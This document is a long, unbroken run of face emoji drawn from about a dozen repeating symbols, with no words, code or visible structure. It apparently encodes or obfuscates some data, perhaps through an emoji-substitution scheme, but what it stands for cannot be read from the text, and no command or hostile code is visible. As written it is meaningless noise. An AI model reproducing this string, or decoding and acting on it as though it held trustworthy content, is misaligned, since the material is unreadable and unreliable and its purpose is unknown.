🤣😇😃🤣🙃😆😃😊😉🙃😆🙂😝🤣😅🙂🤣😁😁😅😊😉😆🙃😝🙂😉😝😅😜😜😂😂🙃😜🤣🙃😂😁😁😇🤣😆😆🤪😀😁😀🙂😇😃😊😉😉😁🙃😇🙂😅😂🤪🤣😂😅😜😇🙃🤣😄😄😊😃😆😀😃🙂😝😃😄🤪😂😁😀😊🙃😉😄🙃😊🙂😆😂😝🤣😊😄😁😆😃🙂😃😄😉😃😁😀😊😜😆🤪😝😝😊😉😁😊😄😀😃😜😉🙂😁😂😇🤣🙃🤣😄😂🙂😊🤪😊😆😝😉😇😂🤣😆🙃😇😝😅😇🤪😊😇😃🤣🤪😀😇🤣😉😃🤪😉🤪😆😀😇😂🤣😆🤪🤣😂🤪🙃😂😁🙃😊😝😆😇😝😊😊🤣🤣🙂🤪😊😂🙂😃😄🙂😅😁😀😊😆😅😊😝🤣😂😄😜😁😃🤪😉😝😁😇😇😊😅😉🤪🙃🤣🙂😆🤣😇😉😄😝😊😆😆😁😝😄😉😁😅😃🤪😄😂🙃😀😝🙂😝😃🤪😊😅😝😇😂🙂😜😂🙂🤣😃😅🤪😊🤣😝😊😉😀😁🤣😅😊😊😀😉😅😉🙃😝😀😜🤣😆😊🤪🤪😜😅😅😊😊😃😄😇🙂😄🙂😊😄😆😃😝😀😉😊😀🤪😆😆🙂🤣😇🤪😅🤪😊🤪😆🙂😝😂🤣🤣😁🤪🤪😊🙂😃😀😊😉😆😄😅😅😅😝🤪🤣😝😜😇😇😇😂😝😃😝😉😃😁🤣😇😆😉😇😂😉😀😁🙃😄😄😃😇🙂😃😊😁😜😇😆😄😄😆😅😀😝🙃😜😄🙂😊😂😆🤣😅😅😃😃🤣😆🤣😇😊😜😃🤣🤣😁😇😄😆😝😝😇🤣😊😆🙂🤪😉🙂😅😀😇😁🙃😇😊😅😆🤪😁😂😄😆🤣😀🤣🙂😆😃😇😊😃😁😜😇😀😜😁😂🙃😀🙂🙃😂🤣🙃😃😝😉😅😆😅😇😁😅😆😜😆😂😆😃😀😇😁😇😁😆😊😝😉🤣🙃😆🙂😜😁😂😂😃🤪🙃🙃😁😅😇😅😉🙂😂🤣😜😜🙂🤪😃😝😄😇😊😆😀😝😇🙃😝😝🤣😆🙃😇🙃😉😄😆😊😁😆😄😆😃😇😃😅🙂😜😀🙂😀😀😃😁😃😊😉😆🙃😝🙂😉😉😁😇😜😂😂😅😃😀🙃😂🙂🙂🤣😅😝😜🤣🤪😜😝😝🙂🤣😁😇😊😁🙃😉😁😜😝😂😁😉😝😆😄😉😉😃🙃🙂😀😝🙂😆😁😊😝😜🙂🙂😆😜😄😅🤣😇🙃😄😂😂😊🤪🤣🤣😅😜😆🙂😁😅😉😃🤣🙃😝😄😀😊😇😆😇😝😅😅😜😝😇🙂🙂😃😂😉😊😃🤣😊🤣😅🤣🤪😂😀😅🙃😊😄😀😉😜😁🤪😃😆😇😃😅😜😇😝🤣🤪😀😉🙃😝😃😜😉🙂😁🙃😇🙂😜🙂🙂😃😃😀🙃😜🙂😊🙂🤣😆😇🙂😂😃😉🤪😀🤪😝😃😝😉🤣😁😅😇😆😜😁😝😉🤪😝🤪😄😆😄😝😂😆😁😆😆😇😊😅😉🤪🙃😊😜😁😜🙂😉😝😃😁😃🙂😅😝😄😄😀🤪😂😂😜😀🤪🙃😝😄😇😊😊😆😉😄😁😉🙂😜😉🙂😉😃😅😉😆😁😁😁🙃😊😄😆🙃🤪😁😁😄🙃😁😃😇😉😊😁😉😁🤪😇🤣😅😂😝😂🤣🙂😜😜🤪😉😊🙂😆😃😝😀😅😜😃😁😀😆🤣😁😅😜🤪😜😉😅😀😜😝😊🤣🤣😜😅🙂😆🤣🤣😀😉😉😀😁😀😅😃😝🤪🤣😝😜😇🙂😊😃😉😉🙃😂😜😀😂🤪😊🤪😅😂😆😀😁🙃😄😄😃😊😀😂😄😀🤪🙃😀🤪😇😂😊😀😉🙃🙃😄🙂😁😂🙃😇😃😅🙃🙂😜😇🙂😄😃😃😉😀🙂🤣😄😝😊😜😆😂😝🤪🤣😉🤪😉😂😊😀😇🤣😉😇😊😅😆🤪😁😂😄😂😆😀😆🙃😃😃😂😉😊😁😁😄😃🤪😉😂🙃😀🙂🙃😂😄🤣😁😅🙃😂😃😁😄🙃😜😆🙂😀😀😜🙃🤪🙃😊😄😃😇😄😉😃🤣🤪😜🙂🙂😂😃🤣🤪😝🤣🤣😇🙂😃🤪🙂😁🤣🙂😀😁🙂🤪😃😝😉😇🙂😉😄😄😊😉😆😁😁😝😀🤣🙃😅😄😆😊😁😆😄😝😃🤣🙂😄😜🤪😁😃😁🙃😇😄😊😊😉🙃😃😁😝😇🙂🤣😄😜🙃😂😇😁🙃😁😊😇😃😅😀😝😜😊😁🤣🤪😀😃🙂😆😃😉🙂😝😁😂😇🤣😅😄😉🙃😃😅🙃😁😄😄😊😃🙃😄😁😆😇🤪😅🙃🤪😅🤣🤪😜😊🙃😝😃😝😉😊😄🙃😝🙃🤣😁😜😅😂😁😀🙂🙃😅😂😆😆🤪😝😝🤣😇😜😊😀😄😃🙃😉🙂😁😂😇🤣😅😅🤪😆😂😁😄😄🙂😀😄😀😉😜😁🤪😇😝😅😇😀😜😂😉😀🙃😃😀😄😂😊😂😆😅😝😅🤣😁😜😄🙂😃😄😄🤣😜😄🤪😊😜😆😇😀😂🤣😉😜🙃🙂🙂😃😂😃😆😁😅😇🤣😅😁🤪😁😂😃😀😄🙂😜😄😆😂😆😁😇😇😝😅😉🙃🙂😂🙂😀🙂🙃🤣😄😅😊😆😆😂🤪😆🤣😃😜😀😂😜😊😝🙃😝😄😝😊😊😆😉😂😇🤣🙂😜🙃🙂🤣😃😅😉😆😁😆😇😄🤣😁🙂😅🤣😜😀😃🙂😝😄🙃😉😊😁😉😇🙃🤣😉🤪😂😂🤣😀🙃🙃😆😄🙂😊😄😆😃😝😀😂😃🤪🤪😂😝😃😃🙃😊😅🙂😊🙃😆🙂😝😂😂🙂😜😅🙂😆😃🙃😉😄🤣😄😇😀😆😜😝🤪🤣😝😜😇🙂😊😃😝😉🙃😁🤪😇😂😅🙂🤪😅🙂😆😀😁🙃😄😄😁😊😀😅😅😇🤪🤣😀🤪😇🙂😝😀😉🙃🙃😄😊😊😂😅😄😝😅🤣😆😜😁😉😄😃😃😉😀😁😄😊🤪😅😀😝😇🙃😄😜😉🙃😊😃🙂😉😂😁😊😇😅🙃😀🤪😁😂😄😀😃🙃😀😃😜😉🤪😆😀😇😇🤣😀🤪😉😂😊😀🙂😊😂😄🤣😊😅😆😂😝😁🤣😅😜😃🙃😜😀😜😊🤪😄😝😊😇😆🤪😝😉🤣😇😜🙂🙂😜😃🤣😇😅😁😆😇😁😅😅🤪😃😂😁😜😜🙃😂😃😝😊🤪😁😊😇😉😅🤪🤪🙂😉😆😀🤣🙃😅😄😆😊😁😆😄😝😃🤣🤣🤪😜🙂😀😀😝🙃😇😄😊😊😉😆🙃😝🙂🤣😇😜🤣🙂😊😃😆😉😁😁😄😇😃😅😀😝😜😂😃😜😝🙂😇😃😊😉😊😁🙃😝😉😜😊🤪🤣😂🙂😀😆😊🤣😄😄😊😃😆😀🤪😃😅🤪🤪😝🙂😀😀😊😉🤣😄🙃😊🙂😆😂😜🤣🤣😅😜😆🙂😂😃😄😉😅😁😀😜😄😆🤪😜😝🤣😇😜😊🙂🤪😃🙃😉😇😁😂😝😉😅😅🤪😆😂😁😀😄🙃😅😄😀😊😆😁🤪😇😝😅😇🤪😊😂😉😀🙃🙃😊😄😂😊🤣😆😅😝🙃🤣😁😜🤣🙂😃😃😀🙃😜😄🤪🤣🙃😆😇😝😇🤣😉😃🙃😆🤪😃😂😉🤪😁😅😇😊😅😁😜😄😂😃😃😄🤪😄😃🤪😊😂😁😇😝🙂😅😉🤪🙃😂🙂😃🙃🙃🤣😄😅😊😜😆😁🤪😊🤣😃😜😀😂😜😄😀🙃😝😄😇😇😂😆😉😜😊🤣🙂😜😂🙂🤣😄😂😉😆😁😁😇😜😅😃😃😅🤣😜😜🤪🙂😝😃😇😉😊😁😉😝😁😅🙂😜😆😂🤣😀😂🙃😆😄😁😊😄😆😃😝🙂😅😜😜🙂😂😝😀🤪🙃😊😁😀😊🙃😆🙂😝😜🤣🤣😃😜🙂😆😃😆😉😄😁😄😇😀😅😁😜😀🤣😝😜😇🙂😊😆😆😉🙃😁🙃😇😂😅😉😜😂😂😆😀😁🙃😄😇😝😊😀😆😀😇🤪😅😝😉😉😂😊😃😄🙃🙃😁😀😊😂😆🤣😝😅😂🤣😄🤪🙂😄😃😉😉😀🤣😁😊🤪😆😝😝😇🙂😊😜😉🙂🙃😄😃😉😂😁😜😇😅😅😉🤪😁🙃😄😀😃🙃😀😄🙃😉🤪😆😆😇😇😂🙃🤪😉🙂😊😀🙂🙃😂😁😃😊😅😅😃😝😁🤣😄😜😃🙃😄😀😜🙃🤪😁🙃😊😇😅🤪😝😉🤣🙃😜🙂🙃🙃😃🤣😉😅😆😃😇😁😂😉🤪😃😂😀😜😜😉😀😃😝😉😇😆🙃😇😉🙂🙃🤪🙂😂😂😀🤣🙃😅😄😆😊😁😆😝😝😃🤣🤪🤪😜🙂😀😀😝🙃😇😄😊😊😉😅😄😝🙂😂😄😜🤣🙂😂😃😆😉🙃😁😄😇😃😅🙃😝😜😃😉😜😝🙂😝😃😊😉😉😁🙃😇😇🤣🙃🤪🤣😂😅😀😆😁😜😄😄😊😄😆😀🤪😃😄🤪🤪😝🙂😅😀😊😊😝😄🙃😊🙂😆😂😜🤣😄😊😜😆🙂😝😃😄😉🙂😁😀😝😁😆🤪😝😝😃😝😜😊🙃😆😃🙃😊😁😁😂😇🤣😅😅🤪😆😁🤣😀😄🙃😉😄😀😉😜😁🤪😝🙂😅😇🤪😜🙂😇😀🙃🙃🙂😄😂🤣😀😆😅😝😅🤣😁😃😄😆😂😃😀😉😝😄🤪😇😉😆😇🤪😊🤣😉😀😊🤣😇😃😂😊🤣😁😅😝😃😅😁🤪😄😂😃😃😄🙂😜😃🤪😊🤪😁😇😜😅😅😉🤪🙃😂🙂😃🙃🙃🤣😄😅😇🤣😆😁😝😅🤣😃😜😀😂😜😄😀🙃😝😄😇😇🤪😆😉🤪😊🤣🙂😜😂🙂🤣😃😅😉😆😁😁😝😄😅😃😜😁🤣😜😜🤪🙂😝😃😇😉😊😁😉😝😂😅🙂🤪😂😂🤣😀😂🙃😆😄🙃😊😄😆😃😝🤪😅😜😁😁😂😝😀😝🙃😊😄😉😊🙃😆😇🤪🙃🤣🤣😜😅🙂😆😅🙂😉😄😁😄😇😀😆😜😄🤪🤣😝😀😆🙂😊😄😂😉🙃😁🙂😇😂😂🤣😉😊😂😆😃😃🙃😄😄🤪😊😀😆😜😇🤪🤣😜😁😜😂😊😃😉🙃🙃😁😅😊😂😆🤣😝😅😂🤣😜😁🙂😄😄😄😉😀🤣😂😊🤪😆😝😝😇😂😝😜😉🙂🙃😄😉😉😂😅😄😇😅😅😆🤪😁🙂😆😀😃🙃😀😁😄😉🤪😁😜😇😇😅😊🤪😉😂🙃😀🙂🙃😂😁🤣😊😅😅😂😝😁🤣😆😜😃🙂😀😀😜🙃🤪😁😊😊😇😅😊😝😉🤣😊😜🙂🙂😝😃🤣😉😅😆😄😇😁😉😃🤪😃😂😃😜😜🙂😜😃😝😊😀😆😝😇😉😅🙃🤪🙂😇🤣😀🤣🙃🤣😄😆😊😂😅😆😝😃🤣😀🤪😜😄🙂😀😝🙃😝😄😊😝😉😁🙂😝🙂😂😅😜🤣🙃😄😃😆😇😃😁😄😝😁🙃😝😝😜😂😝😜😝🙃🙃😃😊😉😉😁🙃😝😉😅😂🤪🤣🙂😅😀😆😉😊😄😄😊😃😆😀🤪😃😅🤪🤪😝🙂😝😀😊😇😁😄🙃😊🙂😆😂🤪🙂🤣😅😜😆🙃😅😃😄😊😄😁😀😊😜😆🤪😝😝🤣😇😜😊🙃🙃😃🙃😊😉😁😂😇🙂😅😅🤪😉😂😁😀😄🙃😜😄😀😅🙃😁🤪😇🤪😅😇😜😉😂😉😀😝😉😉😄😂😊🤣😆😅😂🤪🤣😁😜😁🙂😃😄😄🤣😜😄🤪😇😊😆😇😀😂🤣😉😜🙃🙂🙂😃😂😁😀😁😅😝😄😅😁🤪😁😂😃😀😃🙂😜😁😀😉😝😁😇😝🙃😅😉😜😅😂🙂😀😂🙃🤣😆😅😊😆😆😁🤪😀🤣😃😜🤪😂😜😄😜🙃😝😆😇😊😊😆😉🤪😂🤣🙂😀😅🙂🤣😄😉😉😆😅😁😇😄😅😃🤪🤪🤣😜😀😇🙂😝😁😇😉😊😅😉😇🙃😅🙂😜😅😂🤣😃😁🙃😆😄🤪😊😄🤣😃😝😀😅😜😜😇😂😝😃😉🙃😊🤣😅😊🙃😅😉😝😂🤣🤣😀😅🙂😆😃😜😉😄😁😃😇😀🤣😜😝🤪🤣😝😀😇🙂😊😄😉😉🙃😅🙃😇😂😂🤣🤪😅😂😆😃😁🙃😄😁😃😊😀😅😆😇🤪😂😝🤪😇😂😊😃😉🙃🙃😁🙂😊😂😅😝😝😅🙂😆😜😁🙂😄😄😃😉😀😁😜😊🤪🤣😂😝😇🤣😊😜😉🙂🙃😄🤣😉😂😆🤣😇😅😅😅🤪😁😂😄😀😃🙃😀😄😝😉🤪😁😝😇😇😅😝🤪😉🙂😊😀🙂🙃😂😁😅😊😅😅😃😝😁🤣😄😜😃🙃😄😀😜🙃🤪😁😝😊😇🙂😄😝😉🤣🙃😜🙂🙃🙃😃🤣😉😅😆😅😇😁🤣😜🤪😃😂😀😜😜😉😀😃😝😉😇😆😝😇😉🙂😆🤪🙂😂😂😀🤣🙃😅😄😆😊😁😅😃😝😃😂😄🤪😜🙂😀😀😝😉😇😄😊😊😉😅😂😝🙂😂😝😜🤣🙃😆😃😆😝😁😁😄😇😃😅🤪😝😜🤣😜😜😝😊🤪😃😊😊😇😁🙃😇🙂🤣🤣🤪🤣🙂😃😀😆🙃😁😄😄😝😃😆😀😇😜🤣😝🤪😝🙂😊😀😊😇😃😄🙃😇😉😆😂😝🤣😂🤣😜😆😊😜😃😄😉😃😁😀😊😜😆🤪😝😝😂😊😜😊🙃😊😃🙃😉😉😁😂🤪🤣😅😅🤪😆🙂😄😀😄😉😀😄😀😇🤪😁🤪🤪😝😅😇🤪😊🙂🙃😀🙃😉😂😄😂😝😃😆😅😜😆🤣😁😜😄🙃😀😃😀😉🤪😄🤪😇😊😆😇🤪😝🤣😉😜🙃🙃🙃😃😂😝😁😁😅😇😆😅😁🤪😄😂😃😀😀😉😃😃🤪😊😊😁😇😇😊😅😉🤪🙃😂🙂😀😂😉😂😄😅😇🤣😆😁😝😄🤣😃😜😀😂😜😀🤪😉😇😄😇😊😊😆😉😝😉🤣🙂😀🙃😅🤣😃😅😊😁😁😁🤪🤪😅😃🤪😀🤣😜😜🤪😜😊😃😇😊😉😁😉😇😉😅🙂🤪🙃😂🤣😀😊😇😃😄😁😇😃😆😃😆😝😅😜🤪😜😂😝😀😝🙃😊😄🤪😇😊😆🙂😝😂🤣🤣😂😄🙂😆😃😆😉😄😁😅😝😄😆😜😝🤪🤣😝🙂🙂🙂😊😃😊😉🙃😆😉🙃😂😅🤣😜😆😂😆😀😜🙃😄😄😃😊😀😅😜😊😀😅😝😜😊😂😊😃🙃🙃🙃😆🙃😊😂🤣🤣😝😅🤣😆😀😄🙂😄😄😀😉😀😆😆😊🤪🤣😝😝😇🤣😊😀🙃🙂🙃😄😂😉😂😅🤣😇😅😂😆🤪😁😂😄😃😀🙃😀😄🤪😉🤪🤣😁😇😇😂😊🤪😉😂🙃😃🙂🙃😂😁😁😊😅🤣🙂😝😁😂😆😜😃🙂😀😄😀🙃🤪😅😃😊😇😆😊😝😉🙂🙃😜🙂🙂😂😄😂😉😅😆😅😇😁🙂🙂🤪😃🙂😄😜😜🙂🤪😄😜😉😇😆😉😇😉😅🙃🤪🙂🙂🙃😀🤣🙃😅😁😂😊😁😅😃😝😃🤣😀🤪😜🙃😀😀😝🙃😇😁😜😊😉🙂😄😝🙂🤣😂😜🤣🙂😅😃😆😉😁😆😁😇😃🤣😆😝😜😂😀😜😝🙂😇😃😊😉😉😆🙃😇🙂🤣😂🤪🤣🙂🤣😀😆😉😁😄😄😊😃😆😜😇😜🙂😄🤪😝🙂😇😀😊🙃🤪😄🙃😊🙂😆😂😝🤣😝😝😜😆🙂😆😃😄😇😃😃😜😊😜😅😝😝😝😂😆😜😊😇😆😃🙃😇🤪😄😁😇🤣🤣😆🤪😆😀😆😀😄🙃😄😄😀😊🤪😁🤪😝😃🤣🤪🤪😊😂😉😀🙃😄🙃😄😂😊😂😆😅😜😉😊😜😜😄🙂🙂😃😀😜🤣😄🤪😊🤪😆😇🤪😄🤣😉😜😝🙃😉😃😂😉🤣😁😅😃😊😅😁🤪😁😂😃😄😀😂🤪😃🤪😊😊😁😇😝😁😅😉😄😁😂🙂😄😝😊😀😄😅😇😄😆😁🤣😂🤣😃😜😃😂😜😃😝🙃😝😁😀😇😝😆😉😝🙃🤣🙂🙂😇🙂🤣😃🤣😉😆😁😂😝😆😅😃🤪😀🤣😜🙃🤣🙂😝😃😝😉😊🤣😀😅😊😅🙂🤪🤪😂🤣🙃😝🙃😆😄😆😊😄😆🙂😝😀🤣😁😀😀😂😝😀😇🙃😊😇😄😊🙃😆🙃😝😂🤣😉😀😂🙂😆😃😁😉😄😝😊😇😀😅😀😝🤪🤣😝🙃😜🙂😊😄🙂😉🙃😁🙂😇😂😅😂🤪😅🙂🤣😉🙂🙃😄😁😀😊😀😆😇😇🤪😅😝🤪😇🙂😝😀😉🙃🙃😁🙂😊😂🤣😊😝😅🤣😆😜😁🙃😆😃😃😉😀😆😀😊🤪😅😃😝😇🤣😊😜😉🙃😊😃🙂😉😂😆🙂😇😅😅🤪🤪😁😂😄😀😃🙃😀😃😜😉🤪😆😇😇😇🤣😝🤪😉😂😊😀🙂😉😂😄🤣😊😅😅😄😝😁😂🙂😜😃🙂😜😀😜😊😀😄😝😊😇😅😉😝😉😂😅😜🙂🙂😂😃🤣😇😅😁😆😇😁🤣😃🤪😃😂😜😜😜😊😅😃😝😊🤪😁😊😇😉🤣😉🤪🙂😊😁😀🤣🙃😅😄😆😊😁😆😄😝😃🤣😜🤪😜🙂😜😀😝🙃🤪😄😊😝😉😆🙃😝🙂😂🤣😜🤣🙃😆😃😆😇😄😁😄🤪😃😅😀😝😜😂😝😜😝🙃😊😃😊😝🙃😁🙃🤪🙂😅😂🤪🤣🙂😆😀😆😉😄😄😄😊😜😆😀🤪😃😅🤪🤪😝🙂😝😀😊😇😂😄🙃😊🙂😆😂😝🤣🤣😅😜😆🙃😅😃😄😉😜😁😀😊😜😆🤪😝😝🤣😇😜😊🙃😊😃🙃😊😉😁😂😇🤣😅😅🤪😆😂😁😀😄😉😀😄😀😉😜😁🤪😇🤪😅😇😜😃😁😀😀🙃😉😃😄😂😜😃😆😅😝😅🤣😁😜😆🙂😃😃😆😊😃😄🤪😊😝😆😇😃🤣🤣😉😜😉🙂🙂😃😝😅😇😁😅😇😂😅😁😀😄😂😃😀😃🙂😜😄😀😉😝😆😀😝😝😅😉🤪🙃😂🙂😄😂🙃🤣😄🤣😊😆😆😂🤪😆🤣😃😜😀😂😜😃😃🙃😝😄😝😊😊😅😀😉😀🤣🙂😜🙂🙂🤣😇😂😉😆😁😆😇😄😅😃🤪😀😂😁😃😀🙂😝😃😇😉😊🤪😇😇🙃😅🙃🤪😂😂😉😃😂🙃😆😄😁😊😄😜😅😝😀🤣😀🤪🤪😂😝🙂😆🙃😊😄😇😊🙃😆🙂😝😂🤣🤣😜😅🙃😆😊😆😉😄😁😁😇😀😂😁😝🤪🤣😝😜😇🙂😊😊😄😉🙃😁🙂😇😂😅😂🤪😅😂😆😀😁🙃😄😄😃😊😀😁😜😇🤪😅🤪😜😄😂😊😀😉🙃🙃😅😇😊😜😆🤣😝😅🤣😆😅🤪🤪😂🙂😉😃😀😉😃😄😁😇😀😆😜😁😃😜😉🙂🙃😃🙂😉😂😁🤣🙂😅😉😅😄😁😉🤣😀😊🙃😀😃😜😉🤪😉🙂😁😃😝😆😅😇😝🤪😂😆😜😇🙂😂😄🙂😉🙃😁😅🤣😁😊🙂🙂😆😀😜🙃🤪😄😝😁😁😉😇😆😁😝😝🤪😜😊😉😆🙃😝🙂🤣😂😜🤣🙂😅😇😆😉😜😀😜🙂🤪😃😝😉😇🤣😃😅😇😅🙃🤪🙂😂😂😀🙃🙃😅😄😅😊😁😆🤣😝😃🤣😆😀😃😂🤪😀😝🙃😇😄🤪😊😉😆😉😝🙂🤣😊😀🙂🙂😅😃😆😉😁😆😃😇😃😅😃😝😜🙂😀😇😝🙂😇😃😇😉😉😁🤪😇🙂😅😂🤪🤣😂😅🙃😆🙃😁😄😁😊😃😆😃😇😜😅😜🤪😝🙂🤪😀😊🙃😉😄😉😊🙂😆🙂😝🤣🤣😅😜😆🙃😅😃😄😉😃😁😄😊😜😅😀😝😝🤣😇😜😊🙂😉😃🙃😉🙂😁🙂😇🤣😅😂🤪😆😂😆😀😄😉😁😄😀😉😜😁😜😇😝🤣😃🤪😊😂😉😀🙃😉😉😄😂😊🤣😆😂😝😆🤣🙃😜😄🙂😃😃😀🙃😜😄🤪😊😝😆😝😝😊🤣😇😜🙃🙂🙃😃😂😊🙂😁😅😇😆😅😆🤪😄😂😆😀😀🙂😜😃🤪😊😜😁😇😇😊😅😇🤪🙃😂😉😀😂🙃🤣😄😅😊😆😆😁😝😄🤣😄😜😀🙂😃😀🤪🙃🤪😄😇😊😜😆😉😝🙃🤣🙂😜😂🙂🤣😃😅😉😅😁😁😇😄🤪🙃🤪😀🤣😜😜🤪🙂🤪😃😇😉😊😁😉😇🙃😅🙂🤪😂😂🤣😀🤣😉😅😄😁😊😄😆😃😇🙂🤣😅🤪🤪😂😝😀😇🙂😁😄😂😜😃😂😅😜😅😀😀🤪😝🙂😊😃😁😉😄😁😃😃😁🤣🙃😇😃😀😄😆🙂🙂😉😇😄😉😇😁😇😇😂😅🤣🤪😅😝😊🤣😆😜😜🙂🤣😂🤣😁😜😇🤪😅😝🤪😇😂😊😀😉😝😁🤣🙂🤪😊😆😇😝😅🤣😆😜😁😉😃😃😀😊😆😊🙃😅😆😀🤣😂😄😂😁😜😉🙂🙃😃🙂🤪😜🙃🙃😃😂🙃🤪😄😇😇😊😅🙃😝😊🙂😆😊😅😁😝😇😇😅😊😄🤪😝🤪😂😊😀😊🙃🙂😄😆😊😝😀😂🤣😉😜😃🙂😀😀😜🤪😊🙂🤪😁😀😊😀😆😇😝😄😅🙃😜😁😆😉😉🤪😁😆😇😁😅😄😁🙂😝😜😂😃😜🙃🙃😀😃😇🙃😇😄😝😊🤪😆😝😂😇😀🤣🙃😅😄😆😄😁😉😁😁😉😝😄🤣😄😃😁😀😝🙃😇😄😊😊😉😆🙃😅🙂😊🙃😁🤣🙂🙂😃😂😉😁😁😄😇😃🙃🙃😅😄😉😜😇😆🙃😁😃😊😉😉😁🙃😃😂😉🙂😃😄🙃🙃😀😜😂🙃🤪🙂😆😂😆🤪😇😜😅🤪🤪😝😇😁😂😀😀🤪🤣😝😃😝😊😉😁🙃😇😉🤣😄🤪😂😂😁😀😜😉😆😁😄🤪😆🤪😃🤣😇😜😊🙂😉🤣🙂🤪😜😂🤣🤪🤪😊🙃🤪😆😂😁😀😄🙃😃😄😀😉😜😂😂😀😝🙃😀😜😃😂😉😀🙃🙃🙂😆😁😜😄😁😃🙂😅😜😅😁🙂😉🤣😃😀🙃😜😄🤪😇😜😜😀😝😊🤣😉😜🙃🙃😄😃😂😉🤣😁😅😝🤣😅😁🤪😄😂😄😀😀🙃😄😃🤪😉😝😁😇🤪😊😅😉🤪🙃😂🙃😀😂🙃😂😄😅😊😝😆😁😜😄🤣😃😜😀🙂😀😀🤪🙃🤪😄😇😇🙃😆😉😝🙃🤣🙂😜😂🙂😂😃😅😉🤣😁😁😇😄😅😃🤪😀🤣😜😜🤪🙂😝😃😇😉😊😁😉😇😊😅🙂🤪😊😂🤣😀😅🙃😆😄😁😝😆😆😃😝😃😅😜😀🤪😆😁😀😇😉😀😄😉😊😝😆🙂🤪😁🤣🤣😀😂😝😂😃😁😉🙃😁😃😇🤣😆😜😝🤪🤣😝😀🤪🙂😊😃😉😊😃😁🙂😇🙃😅🤣🤪😅😂😆😃😅🙃😄😄😃😊🙃😁😜😝😁😅😝🤪😇😂😊😃😇🙃🙃😄🙂😇😃😆🤣🤪😀🤣😆😜😁🙂😄😃😃😉😀😄😜😇😅😆😝🤪🤣🤣😊😜😇🙂🙃😃🙂😉😂😁🤣😇😉😅😆🤪😉😂😄😀😁🙃😀😄😅😉🤪😁😝😝😃😅😊😜😊😂🙃😀🙃🙃😂😄😂😊😅😆🙂🤪😅🤣😄😜😃🙂😀😄😀🙃🤪😄🤪😊😇😆😜🤪😇🤣🙃😜🙂🙂😂😄🙃😉😅😁😅😇😁😂😄😉😂😂😀😀😆🙂🤪😄😃😉😇😆😄😇😉😅🙃😃🤪😂😂😀😊🙃😅😄🤣😊😁😆😁😝😃🙂😀😊😅😂🤪😃😄🙃😇😄😜😊😉😅😅😝🙂😂🙃😃😇🙂😅😃😊😉😁😁🙂😇😃😅😀😝😜🙂😀😜😝🙂😇😄😁😉😉😆🙂😇🙂😅😂🤪🤣🙂😂😀😆🙃😁😄😊😊😃😅😃😇😜😅🤪🤪😝🙂🤪😀😊🙃😉😁😁😊🙂😅😂😝🤣🤣😅😜😆🙂😁😃😄😉😃😁😂😊😜😅🙂😝😝🤣🤪😜😊🙂😉😃🙃😉🙂😁😇😇🤣😅😇🤪😆😂😅😀😄🙃😂😄😀😉😜😆😁😇😝😂🤪🤪😊😂😊😀🙃🙃🙂😄😂😊😉😅😂😝😆🤣😁😜😄😉😁😃😀😉😀😄🤪😇😜😃😇😝😊🤣😜😜🙃🙂🤪😃😂😉🤣😁😅😝🤣😃🙂🤪😄😂😂😀😀🙃😇😃🤪😉😝😁😇😝😝😅😉🤪🙃😂😜😀😂🙃😂😄😅😊😆😆😁🤪😆🤣😃😜😀🙂😂😀🤪😉😃😄😇😊😊😆😉😝🙃🤣🙂😜😂🙂😊😃😅😉😇😁😁😇😆😅😃😜😀🤣😜😜🤪🙃😃😃😇😊😁😁😉😇🤪😅🙂🤪😝😄😇😀😅🙃😆😄😁😊🙃😆😃😝😃😅😜😜😀😂😝😃😀😉😝😄😉😊🙃😆🙂😝🤪🤣🤣😜🤣🙂😆😃😁😁😉😁😃😇😀😆😜😝😜🤣😝😜😇🙂😊😃😉😉🙃😁🙂😇😂😅🤣🤪😅😂😆😀😁🙃😄😄😁😊😀😁😜😇🤪😅😝😝😜😂😊😀😉🙃🙃😄🙂😊😂😆🤣😝😅🤣😆🙂😊🙂😄😃😃😉😀😁😀😊🤪😆😝😝😇🤣😊😜😉🙂🙃😃🙂😉🙂😁🙃😇😅😅😆🤪😁🤣😉😀😅🙃😀😃😜😉🤪😊😆😄😝😇😆😅🤪😂😃😃😃🙃😂😄🤣😊😅🙂🤪😆🙂😇😜🤣😃😝😀😂🤪😃😅🙃😄😄🤪😆😁🤪😄🤣🙃😜🙂🙂😂😅🤪😃😉😉😃😄😆😇😀😅😀😝🙃🤣😁🙃😂😃😝😉😇😁😊😝😇😄🙃🤪🙂😂🙂😀🤣🙃🤣😄😆😊😁😆😄😝😃😇🤪🤪😜😂😜😀😝🙃😝😄😊😊😇😆🙃😝🤪😄🤪😜🤣🙂🤣😃😆😉😊😁😄😇😄😅😀😝😜🤣🤪😀😃🙃🤪😃😊😉😉😁🙃😝😀😅😂🤪😂😂😅😀😆😀😊😄😄😊😄😆😀😇😜😅🤪🤪😝😂😇😄😊🙂🙃😄🙃😊🙃😆😂😝😂🤣😅😜😂🙂😁😄😄😆😄😁😀😇😀😆🤪😝😜🤣😇😜😊🙂😉😃😝😊😉😁😂😇🤣😅😅🤪😆😂😁😀😁🙃😃😄😀😆😂😁🤪😇😝😅😇🤪😇😂😉😀🙃🙃🙂😄😂😊🤣😆😅😝😆🤣😆😜😅🙂😃😃😀🙃😜😇😆😇😁😆😇😝😊🤣😉😁😇😇🤪🙂🙃😀😂😉😄😄🙃😆😊🤪😉😂😃😀😀🙂😜🙃😄😃😇😉😉😆😀😇😂😆😊😝😝😂🙃🙃🙃😄🙃😊😆😆😁😝😄😇😜😅😅😜😂🙂😄😉😊😄😇😊😊😆😉🤪😊😁🙂😜😂🙂😂😃😅😉😂😁😁😇😄😅😃🤪😀🤪😂😜🤪🙂😜😃😇😉😊😁😉😇🙃😅🙂🤪😂😁😆😀😅🙃😂😄😁😊😅😆😃😝😀😅😜😜😄🙂😜😀😇🙃😊😄😉😇😆😆🙂😝🙂🤣🤣😜😊🤣😜😃😁😉😄😁😃😇😊😆😜😝😜🤣😝😀😀🙂😊😃🤪😊😊😁🙂😇😂😅🤣😜😀😂😆😀😆🙃😄😄😃😄🙂😁😜😝😆😅😝🤪😝😂😊😀😉🙃🙃😁😉🙂😂😆🤣😝😇🤣😆😜😅🙂😄😃😃😉😀😄😜😀🤪😆😝🤪😆🤣😊😜😜🙂🙃😃🙂😉😂😁🤣😂🙃😅😆🤪😉😂😄😀😁🙃😀😄😃😉🤪😆😝🤣😝😅😊😜😀😂🙃😀🙃🙃😂😄😝😊😅😆😉🙂🙃🤣😄😜😄🙂😀😃😁🙃🤪😄🤪😊😇😆😝😝😉🤣😝😀😉🙂😂😃🤣😉😅😁🙂😇😁😅😁🤪😃😂😀🙃😂🙂🤪😃😝😉😇😁😇😇😉😅🙃🤪🙂😂😂😀🤣🙃😅😄😆😊😆😅🙃😝😃🤣😀